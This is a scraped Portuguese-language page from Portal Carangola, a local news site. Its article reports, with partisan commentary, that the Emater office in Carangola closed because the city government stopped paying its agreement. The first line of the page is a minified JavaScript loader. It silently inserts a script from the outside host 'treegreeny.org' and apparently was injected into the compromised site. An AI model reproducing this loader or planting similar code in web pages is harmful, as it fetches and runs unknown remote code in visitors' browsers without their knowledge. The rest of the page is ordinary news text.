;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Escritório da Emater em Carangola fecha por falta de pagamento pela Prefeitura. - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Escritório da Emater em Carangola fecha por falta de pagamento pela Prefeitura.

Desde que assumiu o Governo em julho de 2010 o Prefeito Patrick tem tratado com descaso o Escritório da EMATER em Carangola. Não honrou os compromissos contratuais a seu tempo e somente em decorrência da mobilização popular o Escritório foi mantido em Carangola com apenas 1 funcionário. Que dedicou com afinco a Carangola e à Emater há anos e tem feito o impossível para atender toda a grande demanda.
Passada as eleições de 7 de outubro e após a derrota nas urnas. Já no dia 09 a Prefeitura não efetuou o pagamento da parcela do Convênio com a Emater e nem os subsequentes até a data de hoje e em decorrência desse débito, o Gerente Regional da Emater enviou um ofício na semana passada e não tendo resposta determinou o fechamento do Escritório da Emater de Carangola por falta de pagamento pela Prefeitura.
Nunca se viu tanta bagunça e desordem em tão pouco tempo. Mais um problema e uma dívida do município que será herdada pelo próximo Prefeito.
Que venha 2013 com as bençãos de Deus para poder haver tempo e muito empenho para corrigir essa bagunça generalizada que se encontra a Prefeitura Municipal de Carangola. Dívidas, dívidas e mais dívidas.
Procurado o Prefeito ele não tem sido visto e nem foi encontrado na Prefeitura e nem no município.

Mais uma bomba que o “irresponsável” vai deixar para o próximo prefeito resolver.

Informação: O Combatente


Ofertas clique aqui


[vitrine]cameras[/vitrine]

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.